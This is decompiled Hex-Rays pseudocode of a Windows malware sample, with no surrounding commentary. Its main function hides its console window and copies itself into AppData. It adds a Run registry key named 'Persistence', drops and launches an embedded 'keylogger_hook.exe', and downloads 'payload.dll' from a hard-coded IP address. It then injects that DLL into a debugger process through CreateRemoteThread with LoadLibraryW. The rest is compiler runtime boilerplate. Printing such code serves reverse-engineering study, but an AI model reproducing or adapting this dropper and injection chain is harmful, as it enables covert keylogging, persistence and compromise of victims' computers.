/* This file was generated by the Hex-Rays decompiler version 9.4.0.260610.
   Copyright (c) 2007-2025 Hex-Rays <info@hex-rays.com>

   Detected compiler: Visual C++
*/

#include <windows.h>
#include <defs.h>

#include <stdarg.h>


//-------------------------------------------------------------------------
// Function declarations

void *sub_401000();
int sub_401010(char *Format, ...);
int __cdecl main(int argc, const char **argv, const char **envp);
int sub_40144D();
int sub_401455();
int __cdecl UserMathErrorFunction();
int sub_401A02();
void sub_401A0C();
char sub_401A18();
void *sub_401A3F();
// int __scrt_initialize_default_local_stdio_options(void); weak
BOOL sub_401A62();
void *sub_401A6E();
void *sub_401A74();
LPTOP_LEVEL_EXCEPTION_FILTER sub_401BD6();
// LONG __stdcall __scrt_unhandled_exception_filter(struct _EXCEPTION_POINTERS *ExceptionInfo); idb
void sub_401C38();
void sub_401C40();
void __cdecl sub_401C6C(); // idb
int sub_401D14();
// void *__cdecl memset(void *, int Val, size_t Size);
// int __cdecl set_new_mode(int NewMode);

//-------------------------------------------------------------------------
// Data declarations

// extern LSTATUS (__stdcall *RegSetValueExW)(HKEY hKey, LPCWSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE *lpData, DWORD cbData);
// extern LSTATUS (__stdcall *RegOpenKeyExW)(HKEY hKey, LPCWSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult);
// extern LSTATUS (__stdcall *RegCloseKey)(HKEY hKey);
// extern HANDLE (__stdcall *CreateFileW)(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
// extern HANDLE (__stdcall *OpenProcess)(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
// extern BOOL (__stdcall *SetFileAttributesW)(LPCWSTR lpFileName, DWORD dwFileAttributes);
// extern HANDLE (__stdcall *CreateToolhelp32Snapshot)(DWORD dwFlags, DWORD th32ProcessID);
// extern BOOL (__stdcall *Process32NextW)(HANDLE hSnapshot, LPPROCESSENTRY32W lppe);
// extern LPVOID (__stdcall *LockResource)(HGLOBAL hResData);
// extern BOOL (__stdcall *Process32FirstW)(HANDLE hSnapshot, LPPROCESSENTRY32W lppe);
// extern BOOL (__stdcall *CloseHandle)(HANDLE hObject);
// extern HGLOBAL (__stdcall *LoadResource)(HMODULE hModule, HRSRC hResInfo);
// extern HRSRC (__stdcall *FindResourceW)(HMODULE hModule, LPCWSTR lpName, LPCWSTR lpType);
// extern DWORD (__stdcall *GetModuleFileNameW)(HMODULE hModule, LPWSTR lpFilename, DWORD nSize);
// extern LPVOID (__stdcall *VirtualAllocEx)(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
// extern HMODULE (__stdcall *GetModuleHandleW)(LPCWSTR lpModuleName);
// extern BOOL (__stdcall *CopyFileW)(LPCWSTR lpExistingFileName, LPCWSTR lpNewFileName, BOOL bFailIfExists);
// extern HANDLE (__stdcall *CreateRemoteThread)(HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
// extern BOOL (__stdcall *VirtualFreeEx)(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
// extern BOOL (__stdcall *AllocConsole)();
// extern void (__stdcall *InitializeSListHead)(PSLIST_HEADER ListHead);
// extern BOOL (__stdcall *WriteFile)(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);
// extern BOOL (__stdcall *WriteProcessMemory)(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten);
// extern FARPROC (__stdcall *GetProcAddress)(HMODULE hModule, LPCSTR lpProcName);
// extern DWORD (__stdcall *SizeofResource)(HMODULE hModule, HRSRC hResInfo);
// extern BOOL (__stdcall *IsProcessorFeaturePresent)(DWORD ProcessorFeature);
// extern LPTOP_LEVEL_EXCEPTION_FILTER (__stdcall *SetUnhandledExceptionFilter)(LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter);
// extern HRESULT (__stdcall *SHGetFolderPathW)(HWND hwnd, int csidl, HANDLE hToken, DWORD dwFlags, LPWSTR pszPath);
// extern HINSTANCE (__stdcall *ShellExecuteW)(HWND hwnd, LPCWSTR lpOperation, LPCWSTR lpFile, LPCWSTR lpParameters, LPCWSTR lpDirectory, INT nShowCmd);
// extern BOOL (__stdcall *ShowWindow)(HWND hWnd, int nCmdShow);
// extern HWND (__stdcall *FindWindowA)(LPCSTR lpClassName, LPCSTR lpWindowName);
// extern int (__cdecl *_stdio_common_vfprintf)(unsigned __int64 Options, FILE *Stream, const char *Format, _locale_t Locale, va_list ArgList);
// extern FILE *(__cdecl *_acrt_iob_func)(unsigned int Ix);
// extern errno_t (__cdecl *wcscat_s)(wchar_t *Destination, rsize_t SizeInWords, const wchar_t *Source);
// extern int (__cdecl *wcsicmp)(const wchar_t *String1, const wchar_t *String2);
// extern HRESULT (__stdcall *URLDownloadToFileW)(LPUNKNOWN, LPCWSTR, LPCWSTR, DWORD, LPBINDSTATUSCALLBACK);
int dword_405048 = 1; // weak
int dword_405050 = -1; // weak
int dword_405054 = -1; // weak
int dword_405058 = 1; // weak
union _SLIST_HEADER ListHead; // idb
_UNKNOWN unk_4053A8; // weak
int dword_4053B0; // weak
int dword_4053B4; // weak
int dword_4053B8; // weak
int dword_4053BC; // weak
_UNKNOWN unk_4053C0; // weak
_UNKNOWN unk_4053C8; // weak
_UNKNOWN unk_4053CC; // weak


//----- (00401000) --------------------------------------------------------
void *sub_401000()
{
  return &unk_4053C0;
}

//----- (00401010) --------------------------------------------------------
int sub_401010(char *Format, ...)
{
  unsigned __int64 *v1; // eax
  FILE *v3; // [esp-10h] [ebp-14h]
  va_list va; // [esp+10h] [ebp+Ch] BYREF

  va_start(va, Format);
  v3 = _acrt_iob_func(1u);
  v1 = (unsigned __int64 *)sub_401000();
  return _stdio_common_vfprintf(*v1, v3, Format, nullptr, va);
}

//----- (00401040) --------------------------------------------------------
int __cdecl main(int argc, const char **argv, const char **envp)
{
  HWND WindowA; // eax
  HRSRC ResourceW; // eax
  void (__stdcall *v5)(HANDLE); // ebx
  HRSRC v6; // edi
  HGLOBAL Resource; // esi
  const void *v8; // edi
  HANDLE FileW; // esi
  HANDLE Toolhelp32Snapshot; // esi
  HANDLE v11; // edi
  void *v12; // esi
  HMODULE ModuleHandleW; // eax
  HMODULE (__stdcall *LoadLibraryW)(LPCWSTR); // eax
  HANDLE RemoteThread; // eax
  HKEY phkResult; // [esp+Ch] [ebp-440h] BYREF
  PROCESSENTRY32W pe; // [esp+10h] [ebp-43Ch] BYREF
  DWORD NumberOfBytesWritten; // [esp+23Ch] [ebp-210h] BYREF
  WCHAR pszPath[260]; // [esp+240h] [ebp-20Ch] BYREF

  AllocConsole();
  WindowA = FindWindowA("ConsoleWindowClass", nullptr);
  ShowWindow(WindowA, 0);
  GetModuleFileNameW(nullptr, pe.szExeFile, 0x104u);
  SetFileAttributesW(pe.szExeFile, 2u);
  SHGetFolderPathW(nullptr, 35, nullptr, 0, pszPath);
  wcscat_s(pszPath, 0x104u, L"\\app_data.exe");
  CopyFileW(pe.szExeFile, pszPath, false);
  SHGetFolderPathW(nullptr, 35, nullptr, 0, pe.szExeFile);
  wcscat_s(pe.szExeFile, 0x104u, L"\\app_data.exe");
  RegOpenKeyExW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006u, &phkResult);
  RegSetValueExW(phkResult, L"Persistence", 0, 1u, (const BYTE *)pe.szExeFile, 0x208u);
  RegCloseKey(phkResult);
  ResourceW = FindResourceW(nullptr, (LPCWSTR)0x65, (LPCWSTR)0xA);
  v5 = (void (__stdcall *)(HANDLE))CloseHandle;
  v6 = ResourceW;
  if ( ResourceW != nullptr )
  {
    Resource = LoadResource(nullptr, ResourceW);
    if ( Resource != nullptr )
    {
      phkResult = (HKEY)SizeofResource(nullptr, v6);
      v8 = LockResource(Resource);
      if ( v8 != nullptr )
      {
        SHGetFolderPathW(nullptr, 26, nullptr, 0, pszPath);
        wcscat_s(pszPath, 0x104u, L"\\keylogger_hook.exe");
        FileW = CreateFileW(pszPath, 2u, 1u, nullptr, 2u, 0, nullptr);
        if ( FileW == (HANDLE)-1 )
        {
          sub_401010("CreateFile Error\n");
        }
        else
        {
          WriteFile(FileW, v8, (DWORD)phkResult, &NumberOfBytesWritten, nullptr);
          CloseHandle(FileW);
          ShellExecuteW(nullptr, L"open", pszPath, nullptr, nullptr, 10);
        }
      }
      else
      {
        sub_401010("LockResource Error\n");
      }
    }
    else
    {
      sub_401010("LoadResource Error\n");
    }
  }
  else
  {
    sub_401010("FindResource Error\n");
  }
  URLDownloadToFileW(nullptr, L"http://210.125.101.75/payload.dll", L"C:\\payload.dll", 0, nullptr);
  phkResult = (HKEY)-1;
  memset(&pe.cntUsage, 0, 0x228u);
  pe.dwSize = 556;
  Toolhelp32Snapshot = CreateToolhelp32Snapshot(2u, 0);
  if ( Process32FirstW(Toolhelp32Snapshot, &pe) )
  {
    while ( wcsicmp(L"x32dbg.exe", pe.szExeFile) != 0 )
    {
      if ( !Process32NextW(Toolhelp32Snapshot, &pe) )
        goto LABEL_15;
    }
    phkResult = (HKEY)pe.th32ProcessID;
LABEL_15:
    v5 = (void (__stdcall *)(HANDLE))CloseHandle;
  }
  v5(Toolhelp32Snapshot);
  v11 = OpenProcess(0x1FFFFFu, false, (DWORD)phkResult);
  v12 = VirtualAllocEx(v11, nullptr, 0x1Eu, 0x3000u, 4u);
  WriteProcessMemory(v11, v12, L"C:\\payload.dll", 0x1Eu, nullptr);
  ModuleHandleW = GetModuleHandleW(L"kernel32.dll");
  LoadLibraryW = (HMODULE (__stdcall *)(LPCWSTR))GetProcAddress(ModuleHandleW, "LoadLibraryW");
  RemoteThread = CreateRemoteThread(v11, nullptr, 0, (LPTHREAD_START_ROUTINE)LoadLibraryW, v12, 0, nullptr);
  v5(RemoteThread);
  VirtualFreeEx(v11, v12, 0x1Eu, 0x8000u);
  v5(v11);
  return 0;
}
// 403360: using guessed type wchar_t aCPayloadDll_0[15];

//----- (0040144D) --------------------------------------------------------
int sub_40144D()
{
  __scrt_initialize_default_local_stdio_options();
  return 0;
}
// 401A45: using guessed type int __scrt_initialize_default_local_stdio_options(void);

//----- (00401455) --------------------------------------------------------
int sub_401455()
{
  int v0; // eax

  sub_401BD6();
  v0 = UserMathErrorFunction();
  return set_new_mode(v0);
}

//----- (004019FF) --------------------------------------------------------
int __cdecl UserMathErrorFunction()
{
  return 0;
}

//----- (00401A02) --------------------------------------------------------
int sub_401A02()
{
  return 1;
}

//----- (00401A0C) --------------------------------------------------------
void sub_401A0C()
{
  InitializeSListHead(&ListHead);
}

//----- (00401A18) --------------------------------------------------------
char sub_401A18()
{
  return 1;
}

//----- (00401A3F) --------------------------------------------------------
void *sub_401A3F()
{
  return &unk_4053A8;
}

//----- (00401A62) --------------------------------------------------------
BOOL sub_401A62()
{
  return dword_405048 == 0;
}
// 405048: using guessed type int dword_405048;

//----- (00401A6E) --------------------------------------------------------
void *sub_401A6E()
{
  return &unk_4053CC;
}

//----- (00401A74) --------------------------------------------------------
void *sub_401A74()
{
  return &unk_4053C8;
}

//----- (00401BD6) --------------------------------------------------------
LPTOP_LEVEL_EXCEPTION_FILTER sub_401BD6()
{
  return SetUnhandledExceptionFilter(__scrt_unhandled_exception_filter);
}

//----- (00401C38) --------------------------------------------------------
void sub_401C38()
{
  dword_4053B0 = 0;
}
// 4053B0: using guessed type int dword_4053B0;

//----- (00401C40) --------------------------------------------------------
void sub_401C40()
{
  ;
}
// 401C40: could not find valid save-restore pair for edi

//----- (00401C6C) --------------------------------------------------------
void __cdecl sub_401C6C()
{
  ;
}
// 401C6C: could not find valid save-restore pair for edi

//----- (00401D14) --------------------------------------------------------
int sub_401D14()
{
  int v5; // edi
  int v11; // eax
  int v12; // edx
  unsigned int v14; // edi
  unsigned int v29; // esi
  int v30; // eax
  unsigned int v31; // ecx
  int v32; // eax
  int v33; // eax
  int v34; // ecx
  unsigned int v35; // eax
  int v36; // edi
  int v38; // [esp+0h] [ebp-28h]
  int v39; // [esp+10h] [ebp-18h]
  int v40; // [esp+10h] [ebp-18h]
  int v41; // [esp+14h] [ebp-14h]
  int v42; // [esp+14h] [ebp-14h]
  char v43; // [esp+18h] [ebp-10h]
  int v44; // [esp+1Ch] [ebp-Ch]
  int v45; // [esp+20h] [ebp-8h]
  int v46; // [esp+24h] [ebp-4h]

  dword_4053B8 = 0;
  dword_405058 |= 1u;
  if ( IsProcessorFeaturePresent(0xAu) )
  {
    _EAX = 0;
    __asm { cpuid }
    v46 = _EAX;
    v5 = _EBX ^ 0x756E6547;
    v39 = _EDX ^ 0x49656E69;
    v41 = _ECX ^ 0x6C65746E;
    _EAX = 1;
    __asm { cpuid }
    v38 = _EAX;
    if ( (v5 | v41 | v39) == 0 )
    {
      v11 = _EAX & 0xFFF3FF0;
      if ( (v38 & 0xFFF3FF0) == 0x106C0
        || v11 == 132704
        || v11 == 132720
        || v11 == 198224
        || v11 == 198240
        || v11 == 198256 )
      {
        dword_4053BC |= 1u;
      }
    }
    v12 = _ECX;
    _EBX = 0;
    v42 = 0;
    v14 = 0;
    v40 = 0;
    v44 = _ECX;
    if ( v46 >= 7 )
    {
      _EAX = 7;
      __asm { cpuid }
      v45 = _EBX;
      v42 = _EDX;
      if ( (_EBX & 0x200) != 0 )
        dword_4053BC |= 2u;
      if ( _EAX >= 1 )
      {
        _EAX = 7;
        __asm { cpuid }
        _EBX = v45;
        v40 = _EDX;
      }
      _EAX = 36;
      if ( v46 >= 36 )
      {
        __asm { cpuid }
        v29 = _EBX;
        _EBX = v45;
        v14 = v29;
      }
      v12 = v44;
    }
    v30 = dword_405058 | 2;
    v31 = dword_405050 & 0xFFFFFFFE;
    dword_4053B8 = 1;
    dword_405058 |= 2u;
    dword_405050 &= ~1u;
    if ( (v12 & 0x100000) != 0 )
    {
      v32 = v30 | 4;
      dword_4053B8 = 2;
      dword_405058 = v32;
      dword_405050 = v31 & 0xFFFFFFEF;
      if ( (v12 & 0x8000000) != 0 && (v12 & 0x10000000) != 0 )
      {
        __asm { xgetbv }
        v43 = v32;
        if ( (v32 & 6) == 6 )
        {
          v33 = dword_405058 | 8;
          dword_4053B8 = 3;
          dword_405058 |= 8u;
          if ( (_EBX & 0x20) != 0 )
          {
            v34 = dword_405054;
            dword_405058 = v33 | 0x20;
            v35 = dword_405050 & 0xFFFFFFFD;
            dword_4053B8 = 5;
            dword_405050 &= ~2u;
            if ( (_EBX & 0xD0030000) != 0xD0030000 )
            {
LABEL_27:
              if ( (v42 & 0x800000) != 0 )
              {
                dword_405054 = v34;
                dword_405050 = v35 & 0xFEFFFFFF;
              }
              if ( (v40 & 0x80000) != 0 && (v43 & 0xE0) == 0xE0 )
              {
                dword_4053B4 = v14 & 0x400FF;
                v36 = dword_405050 & ~(HIWORD(v14) & 7 | 0x1000028);
                dword_405050 = v36;
                if ( (unsigned int)dword_4053B4 > 1 )
                  dword_405050 = v36 & 0xFFFFFFBF;
              }
              return 0;
            }
            if ( (v43 & 0xE0) == 0xE0 )
            {
              dword_405058 |= 0x40u;
              v35 = dword_405050 & 0xFFFFFFDB;
              v34 = dword_405054;
              dword_4053B8 = 6;
              dword_405050 &= 0xFFFFFFDB;
              goto LABEL_27;
            }
          }
          v34 = dword_405054;
          v35 = dword_405050;
          goto LABEL_27;
        }
      }
    }
  }
  return 0;
}
// 401D14: could not find valid save-restore pair for ebx
// 401F7E: conditional instruction was optimized away because ecx.4==0
// 401FEE: conditional instruction was optimized away because ecx.4==0
// 405050: using guessed type int dword_405050;
// 405054: using guessed type int dword_405054;
// 405058: using guessed type int dword_405058;
// 4053B4: using guessed type int dword_4053B4;
// 4053B8: using guessed type int dword_4053B8;
// 4053BC: using guessed type int dword_4053BC;

// nfuncs=75 queued=18 decompiled=18 lumina nreq=0 worse=0 better=0
// ALL OK, 18 function(s) have been successfully decompiled
